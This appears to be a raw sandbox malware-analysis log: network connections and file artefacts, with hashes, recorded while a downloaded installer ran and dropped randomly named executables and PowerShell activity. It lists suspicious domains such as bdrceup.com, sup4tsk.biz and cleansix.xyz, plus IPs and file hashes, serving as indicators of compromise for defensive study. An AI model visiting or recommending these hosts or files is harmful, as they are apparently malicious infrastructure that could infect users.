| RU | 80.78.240.92:80 | rfiles1.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles1.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles1.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles1.tracemonitors.com | tcp |
| GB | 162.125.64.16:443 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | tcp |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| GB | 162.125.64.16:443 | ucdbc8f3c56f284606b1b243c910.previews.dropboxusercontent.com | tcp |
| US | 162.125.21.3:443 | beacon.dropbox.com | tcp |
| US | 162.125.21.3:443 | beacon.dropbox.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| US | 104.16.100.29:443 | cfl.dropboxstatic.com | tcp |
| NL | 142.250.102.84:443 | accounts.google.com | udp |
| NL | 142.250.102.84:443 | accounts.google.com | tcp |
| DE | 18.196.235.131:3478 | use1-turn.fpjs.io | tcp |
| US | 44.237.52.63:443 | api5.tracemonitors.com | tcp |
| N/A | 10.127.0.143:50178 | udp | |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.21.67.200:443 | soneremonasez.shop | tcp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| RU | 87.250.251.119:443 | mc.yandex.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| NL | 178.250.1.11:443 | dnacdn.net | tcp |
| US | 35.227.244.1:443 | shop.pe | udp |
| NL | 185.89.210.180:443 | tcp | |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | tcp |
| US | 104.18.36.155:443 | tcp | |
| NL | 35.214.149.91:443 | tcp | |
| NL | 141.226.228.48:443 | tcp | |
| US | 34.117.157.22:443 | tcp | |
| FR | 185.255.84.152:443 | tcp | |
| IE | 34.249.153.141:443 | tcp | |
| GB | 95.100.244.20:443 | tcp | |
| DE | 18.157.155.23:443 | tcp | |
| US | 104.18.36.155:443 | udp | |
| IE | 34.245.246.15:443 | tcp | |
| US | 50.31.142.31:443 | tcp | |
| NL | 198.47.127.205:443 | tcp | |
| NL | 69.173.156.148:443 | tcp | |
| US | 52.4.154.75:443 | tcp | |
| GB | 2.18.109.35:443 | tcp | |
| US | 13.248.245.213:443 | tcp | |
| DE | 35.156.89.203:443 | tcp | |
| GB | 2.18.109.192:443 | tcp | |
| IE | 54.74.123.69:443 | tcp | |
| DE | 18.192.71.245:443 | tcp | |
| DK | 37.157.4.28:443 | tcp | |
| NL | 46.228.174.117:443 | tcp | |
| IE | 63.32.136.28:443 | tcp | |
| NL | 178.250.1.9:443 | tcp | |
| NL | 178.250.1.9:443 | tcp | |
| US | 35.227.244.1:443 | shop.pe | tcp |
| US | 52.217.80.60:443 | tcp | |
| US | 8.8.8.8:53 | 35.109.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.245.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.109.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.142.31.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.154.4.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.71.192.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.123.74.54.in-addr.arpa | udp |
| DE | 35.156.89.203:443 | tcp | |
| US | 35.190.54.17:443 | tcp | |
| DK | 37.157.2.228:443 | tcp | |
| US | 35.227.244.1:443 | shop.pe | tcp |
| US | 99.83.128.14:443 | tcp | |
| US | 35.227.244.1:443 | shop.pe | udp |
| US | 99.83.128.14:443 | tcp | |
| GB | 13.224.81.3:443 | tcp | |
| NL | 178.250.1.25:443 | tcp | |
| SE | 45.155.250.90:53 | bdrceup.com | udp |
| GB | 142.250.200.46:443 | www.youtube.com | udp |
| LT | 94.156.8.80:80 | bdrceup.com | tcp |
| US | 192.200.160.13:443 | store-fhnch.mybigcommerce.com | udp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | go.rmhfrtnd.com | udp |
| US | 8.8.8.8:53 | go.rmhfrtnd.com | udp |
| US | 104.18.40.50:443 | go.rmhfrtnd.com | udp |
| US | 104.18.40.50:443 | go.rmhfrtnd.com | tcp |
| US | 8.8.8.8:53 | stripchat.com | udp |
| US | 8.8.8.8:53 | stripchat.com | udp |
| US | 104.17.118.12:443 | stripchat.com | udp |
| US | 8.8.8.8:53 | assets.strpst.com | udp |
| US | 8.8.8.8:53 | assets.strpst.com | udp |
| US | 104.17.11.106:443 | assets.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 104.17.11.106:443 | img.strpst.com | udp |
| US | 104.17.11.106:443 | img.strpst.com | udp |
| US | 8.8.8.8:53 | static-cdn.strpst.com | udp |
| US | 8.8.8.8:53 | static-cdn.strpst.com | udp |
| US | 104.17.11.106:443 | static-cdn.strpst.com | udp |
| US | 8.8.8.8:53 | creative.xxxivjmp.com | udp |
| US | 8.8.8.8:53 | creative.xxxivjmp.com | udp |
| US | 172.64.147.206:443 | creative.xxxivjmp.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| US | 104.18.40.50:443 | creative.xxxivjmp.com | udp |
| US | 8.8.8.8:53 | go.stripchat.com | udp |
| US | 8.8.8.8:53 | go.stripchat.com | udp |
| US | 8.8.8.8:53 | stquality.org | udp |
| US | 8.8.8.8:53 | stquality.org | udp |
| US | 104.21.8.107:443 | stquality.org | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | udp |
| US | 104.17.118.12:443 | go.stripchat.com | tcp |
| US | 104.17.117.12:443 | go.stripchat.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.17.117.12:443 | go.stripchat.com | udp |
| LT | 94.156.8.80:80 | bdrceup.com | tcp |
| US | 8.8.8.8:443 | dns.google | udp |
| US | 104.17.117.12:443 | go.stripchat.com | tcp |
| US | 104.17.117.12:443 | go.stripchat.com | udp |
| US | 8.8.8.8:443 | dns.google | udp |
| US | 104.17.11.106:443 | static-cdn.strpst.com | udp |
| US | 104.17.11.106:443 | static-cdn.strpst.com | udp |
| US | 104.17.10.106:443 | static-cdn.strpst.com | udp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | secondappad.me | udp |
| US | 8.8.8.8:53 | secondappad.me | udp |
| US | 8.8.8.8:53 | secondappad.me | udp |
| US | 8.8.8.8:53 | secondappad.me | udp |
| DE | 88.99.166.117:80 | secondappad.me | tcp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 104.21.64.40:443 | cleansix.xyz | udp |
| US | 104.21.64.40:443 | cleansix.xyz | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| US | 8.8.8.8:53 | rouonixon.com | udp |
| NL | 139.45.197.238:443 | rouonixon.com | tcp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| US | 8.8.8.8:53 | my.rtmark.net | udp |
| NL | 139.45.195.8:443 | my.rtmark.net | tcp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| US | 8.8.8.8:53 | s.click.aliexpress.com | udp |
| GB | 23.214.144.96:443 | s.click.aliexpress.com | tcp |
| US | 8.8.8.8:53 | best.aliexpress.com | udp |
| US | 8.8.8.8:53 | best.aliexpress.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | assets.alicdn.com | udp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| US | 8.8.8.8:53 | ae01.alicdn.com | udp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 23.214.144.96:443 | assets.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| GB | 95.100.244.36:443 | ae01.alicdn.com | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | udp |
| LT | 94.156.8.80:80 | bdrceup.com | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | secondappad.me | udp |
| US | 8.8.8.8:53 | secondappad.me | udp |
| DE | 88.99.166.117:80 | secondappad.me | tcp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 172.67.175.236:443 | cleansix.xyz | udp |
| US | 172.67.175.236:443 | cleansix.xyz | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f53eb880cad5acef8c91684b1a94eed6 |
| SHA1 | afab2b1015fecbc986c1f4a8a6d27adff6f6fde9 |
| SHA256 | 5cb8554e763313f3d46766ab868f9d481e3644bfc037f7b8fe43d75d87405a27 |
| SHA512 | d53f3965428f73c0dfed1d941a9ff06eb70b254732410b815bc759b8c7904e11292ad7e9624c12cccaed6763e7bea68208bc0b67fc70b7616d25bda143833794 |
\??\pipe\LOCAL\crashpad_4272_BQWSCTYAJRQDMPZJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | b0499f1feacbab5a863b23b1440161a5 |
| SHA1 | 37a982ece8255b9e0baadb9c596112395caf9c12 |
| SHA256 | 41799b5bbdb95da6a57ae553b90de65b80264ca65406f11eea46bcb87a5882a7 |
| SHA512 | 4cf9a8547a1527b1df13905c2a206a6e24e706e0bc174550caeefabfc8c1c8a40030e8958680cd7d34e815873a7a173abe40c03780b1c4c2564382f1ceed9260 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 543f18b1780527ce1a6b8c2310a5c91f |
| SHA1 | 401dd4223dd3eb0407e419d79084fdcca5992c48 |
| SHA256 | a55140de4ca877df3a45da84cd8b1bd8257f9acf2233334ad5da54dab87b16e8 |
| SHA512 | 22b438004a832bd2a207a08224e924c0a6782fe43f9463dde3957cda86aa0e84d3c9f6ade9bfe63051f07c11b8c3687360d78d6b0f73228235b075a74e7317e3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5418dfcafa872df0b9f2d2245539c7b5 |
| SHA1 | a38bb33c3d7b9112ed0e4020d31a68253b908456 |
| SHA256 | 7332423e5f3ad12026cbe502fac55b732812c4f3cfe54c9e124bbd99fc2f2f93 |
| SHA512 | 543e0964951789dc4f4959b296f2b78f4e7d96b63e73b579fb5acbbc0fba2676d52895c919aeb26efc17d0db58f6c6f28312e9a129314b23684ebf4a4e9faebd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 89a515fffa10b3cef0db27d316e77189 |
| SHA1 | 75c8bf5926f7160f2e68513c4f5b73fba4c7bc4e |
| SHA256 | e3c85c04603de885ff372b9facda571e11f1963af472bea4b05c6bf961d0bd33 |
| SHA512 | 3e08d04916b47aabc4ec110bce9dd5c5240c78b2bf132b13552e10cd7344a52dd6111340dcfe94e29297404a105af73b23b5ba20449a63e1fa6739e3cf942ad5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 982d83e9da5ca5a75a219f2d3de0f924 |
| SHA1 | 980ab1efe1d9f5c477708f6cb4da7bc372430084 |
| SHA256 | a7029839fd07da6103ded6c0195a33ee619006f63cb89f092ff011f34e59107a |
| SHA512 | fd729dac3d7447cb5292d964d9152245901868e19d559ae51fea2855f8885b41b4162641e926f0cb698b8e25be1371594d28cfed17d73a7ad120ded0d4f37a59 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 2e07229933a977b1cbd6ded60e2ab7d8 |
| SHA1 | dad9000c439b15f37cb0d54d1045035a2b910a2b |
| SHA256 | 111fa7c52ef4a43462aeef3450239929a8221b3d89a97940f20f29af702416b1 |
| SHA512 | bde7dfc7884e8588e415202d10d021dbbcd8296ad1a2d1a0b3be77e4a50dc4ef21124cf04081c2e43a9f4e83b6e137cdb768099c08871f559f0fd12b6ba8f5ba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe582f29.TMP
| MD5 | d44cf600175f329b0dbe0a7cc85c5468 |
| SHA1 | d466c663934fed6e7752f593675c760f1e9ac1ab |
| SHA256 | 7c78a9341392a065b6f90b696177de9a1437f344ecab02d2d43b3b359754c703 |
| SHA512 | 6f6c55bfa750dddbb4ce6eab50a06963abc51bc8ad594b579489ef2c423b67ad0828aca305d6d521b3fab6db15abdc848874dcc8b2a780115e72b54a5917329f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2999632de07520e8c9d70072c02f0485 |
| SHA1 | 27294b40a14814f20499a4fdd880ffdbe3ecb2e4 |
| SHA256 | a3bf996b3d952cb8dc651977d53b82a03537eb4365d4b72c8c27ed923dd2e82e |
| SHA512 | 679b17eb873cdf6b2f32ee5f4f44a498c342a11a87e3eb965d52570e754bc4d06595549872f291f3e007fb3201b310a2f760732f6983ccc26829f1bf47af0132 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | c08d27fc6c91d80159976a26b9617d5d |
| SHA1 | 1e9966fba686ac703f8b8ad8d086a481655fe879 |
| SHA256 | d06051b67c0a2e98b41a4f1176ccae1d30f7f5b4d2961dfb52c78ae133ec619c |
| SHA512 | aadb038ccab6472e2ce7189332388b39f1f01ef791077bde258d1e305cb5268eeb68468a867b4a0505154172aff5eb766150fd1316fd7c0f099bc830f7612059 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5868e6.TMP
| MD5 | 9811a4b5f43a030279856720369b03c7 |
| SHA1 | b6bf8f3c3c437c276e7051da71c18477c6385898 |
| SHA256 | cf2d67fcda33157afd7607e4b7acb171c666236125fc2f715f9267ca842fe467 |
| SHA512 | 1d7e1a282b24221b1dd9670e1a16507c173ab3fe7e5d74ebcadcb27e834560581191d1caede22a61f840ecc9cff91d3a030346143a002e8ec9a0d3e863e83af1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008
| MD5 | 151fb811968eaf8efb840908b89dc9d4 |
| SHA1 | 7ec811009fd9b0e6d92d12d78b002275f2f1bee1 |
| SHA256 | 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed |
| SHA512 | 83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674 |
C:\Users\Admin\Downloads\setup_mp6kEAYHxE.zip
| MD5 | 9b9eaa8c6ef66aa72e8633feccc7cfec |
| SHA1 | 39a3d9a0e3a248a04b8dbdd9df22a266a693758e |
| SHA256 | 480254967ecfbe60c81191b24eeba59fc2a58a38a9eb81f7ffb2cee0f2f15df7 |
| SHA512 | 259812e3a8d48b166a82dcca062dc5c33b92488f6194cab5d80fb2b576dff05924223dd2e2ed328ba1af85497fb265a488ac664a8d4c1dc6baf158053795321b |
C:\Users\Admin\Downloads\setup_mp6kEAYHxE.zip:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 602c64a5a59ab8663d95a2465dc9316f |
| SHA1 | 00a8688acccfc337adca1395e9fe873c16e5166f |
| SHA256 | 9feab0938e4075314a55b97d337866b32dc11447fb3a76c62542113cd7c74b92 |
| SHA512 | 90a6d4f2021802b273618350aeefbc162c20a94326d73a35651b619177c6a9ddeaa0e45302889831bc65bc4da670cdcd8a9c89c5e82df679cbef2f7d6c296d95 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\c184413b-1b58-47ad-bca6-bd60ce1cc535.tmp
| MD5 | 200614b4c708dd07bf339d4b8ee225a5 |
| SHA1 | c304cabbda9987a2a521349ee13045d2834e10cb |
| SHA256 | 9f5e80d96951c612c0101fb14cc0c2500d89fd77ec6309763103a85fc8bbbc10 |
| SHA512 | dd6186fe74921478bef3be7d57dc36a5210f2baaeafb6f06f08f9fc9204a75b4ead7ef542fbd0838f78ec7fe4ae4ed9006e73ae8b6b16d3780f522b5281c58ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 20112cceecccf2d434459237766bfea3 |
| SHA1 | 025c80a01c8a3b2d3a0b6f65292190631a9ecf37 |
| SHA256 | d6a35909237dc5c4bb716fabc0cb5b86ceb90d700e768a70b1b91aa4e25b8def |
| SHA512 | e6512a0848d95d66916cfd67e4cd0ca303a29788c484ddf60377c0b8b28eb517da2c83dac7abecb1d87af1bbac9bcad8d6679ddc57bbe51f4cd6249858341934 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | cadba7c9d29f41fc30d6b264011f19d2 |
| SHA1 | 339ae6a365a7f3c0a640231c1f22d1b91c2f01f7 |
| SHA256 | 5200ad1d9f0244f8358d6ff9bde9e9869ca1949832b3135b3b60292dbe3b661a |
| SHA512 | ccb80fe325310597262b9a1ee91443c70fd8a6a42c5233ffe781fbedc72dbc742991245ca672ee50abf431296474d9612c10b6d598bbaa7e9bbdd4246708c50c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 992d06a6816590427815f46773f25c7c |
| SHA1 | f5294b10dd6f25733f0467c486a9b421e5eb0fde |
| SHA256 | 663dcb74e5bb0dc07d395d56b9f9d55440c639b96eb015f0e6016fa72acc56ed |
| SHA512 | 47a7beed9c4621b199225976200a8067d71ad07029ed7193484b380ee8c518c1f0e901d672c2a3208aea71e9127f741364c12f362d8b6736c93509b3cc07cc4c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c8a57c714c0de1480fdedd3e5a5b6d1d |
| SHA1 | 56a91651c6f141afaafb3cd3f04ed1d417ac432d |
| SHA256 | 421854c91621778b21a16121f8713eb16378912dce62e7a2b669f1ed6992391a |
| SHA512 | d0f78144eee0a52dfaef76f0afd96e099d2b487eaf5898d1b5d0067933fd06ead59c381feda47eb188d49f132cfaace7a00bb444d5ba20e18a5574d4dd7af4ed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f3250245b73ff92661d3793bc1bbe3f5 |
| SHA1 | 19f788574cadbfc8f00ec60580f94ec7ad0b80c2 |
| SHA256 | 9d8c2c73cb4205908f12b766745926c653fa8fe580a109fba97159e3249c07cb |
| SHA512 | f405774749e29bbbb6eb1b0a8c07e0d8b611fe55eb59a7cfc7aa9c6fa8f401d03715dd8b27a16098d33ee3584939a3bd19e274e19bd6610c17195f59a1fff8ec |
memory/4404-314-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-54FQC.tmp\setup_mp6kEAYHxE.tmp
| MD5 | 342a82bc863ecba35b4a2d60efb5274e |
| SHA1 | 7ce89b656f92979051a62b65fb4d79c8505edb19 |
| SHA256 | cb24d14ac842ce8230bb9ab71801ee1fd7ef40458a7fdb35d672b7b1cdf466b4 |
| SHA512 | 64b68b85422980b1992b5a18fe2d03a1c5f7ec1c6cce7347c4a1b3dfd4d4f13ce72fd3c178e22a0050567e908132c3d1d9760506a214401ff53e30415528d9cd |
C:\Users\Admin\AppData\Local\Temp\is-7Q1J2.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
| MD5 | 4351fed433c00446d4e99c0c8d441d69 |
| SHA1 | f68ec05d2b210dc5e959863f184245e795003919 |
| SHA256 | 79b31752f002a877efe019b622edbf630aa668e0d6d7b7208b071ecaf9da7265 |
| SHA512 | 5592c25d203a76cd6f82ff82de546816077881d6e2cfe0095e2bf186210eddacb8598b26b5a003b09a5bbafab2334009fdf1cec55bac49d9878d8bacd1f0da06 |
memory/2768-383-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/2768-384-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/2664-390-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/4404-389-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2768-391-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/1856-598-0x0000000002780000-0x00000000027B6000-memory.dmp
memory/2164-599-0x00000000057B0000-0x0000000005DDA000-memory.dmp
memory/2164-607-0x0000000006020000-0x0000000006086000-memory.dmp
memory/2164-606-0x0000000005FB0000-0x0000000006016000-memory.dmp
memory/2164-605-0x0000000005F10000-0x0000000005F32000-memory.dmp
memory/2164-611-0x0000000006090000-0x00000000063E7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d3myh332.5cd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2164-621-0x0000000006A30000-0x0000000006A7C000-memory.dmp
memory/2164-620-0x0000000006550000-0x000000000656E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 94bf0182a9c9ac4167d7597437df59d6 |
| SHA1 | ac3df4b2b7b920948cbb522728710656435fb754 |
| SHA256 | 728ef55ac344a3b5793c1142e2db621ed2437a9e29ef876294c9fb38207547fe |
| SHA512 | d3d9807a7ae4aace6dff65c48e6b9f80e0062fdc8b010f78eddaf376c377d5c16c3aad276a61fa1fff3a4bb3deb17b6b79bef86421c62754741778daaa6e5b9d |
memory/2164-641-0x0000000006A00000-0x0000000006A1A000-memory.dmp
memory/2164-640-0x0000000007D40000-0x00000000083BA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 7694cd7e490fad3ded182bbafe06ff45 |
| SHA1 | 984f2807722aec60cf8c834f73802e016137e50a |
| SHA256 | 1c80755388fa564f12180cfb78f4b8be4070e4457cf2b9aa6bbbe4b3ea172271 |
| SHA512 | 032137a8e55e32068cdd1deec91931940033c693388d70e649b57b2b09d379dc71b1b444789a29691b1604d2c2c902ba82bb24c21d113e94a3ad42ace6243813 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2b23be2811f7d6fdbeb4d6d6a29cf8ce |
| SHA1 | 214d89cf7736b374006527213c49534d7a78d122 |
| SHA256 | c1ac3486d3484146349796295dd35769d131cef7e9f81efc4a4b137b84d9cd44 |
| SHA512 | e1577bd55ac09c6ac00c8d5e7c4a5fb7e1c954d3c66f25e0924d53f90aaa564f2790669d13810a36387f60f0aaf76f52e9c2569f306859417ff1ff815a70e2b5 |
C:\Users\Admin\AppData\Local\Temp\OyqhYEWh\LPXAmkqoQNOEThly5U.exe
| MD5 | b78cd5eae0553b2f1334347076a7ff00 |
| SHA1 | 9045f40797d29aa23c155499d51f4431e9431aa4 |
| SHA256 | d3f6a5cf3230af0c28d5590aec59417e76549076b47dee5d5819d7a4db248816 |
| SHA512 | 80e49d3c4cac1e02682a4d57e75a3c61d046002d95cf049adcd4a39c6c3535800f27f7c581ab2294fb4c86c749601b1eb5d3930cc5438807fa220a2d4953bdca |
memory/4748-663-0x0000000006330000-0x0000000006687000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\aW3SFbVV\AxnTxNXsNH.exe
| MD5 | bfcf6a8099e1c16e23720637b74e2621 |
| SHA1 | 928302f4795c14c1c481475122cabd36af1db2d4 |
| SHA256 | ddee82b36825dab91ef266287694fcce8aeb12ed3bb7b1858e1cd016610a8e40 |
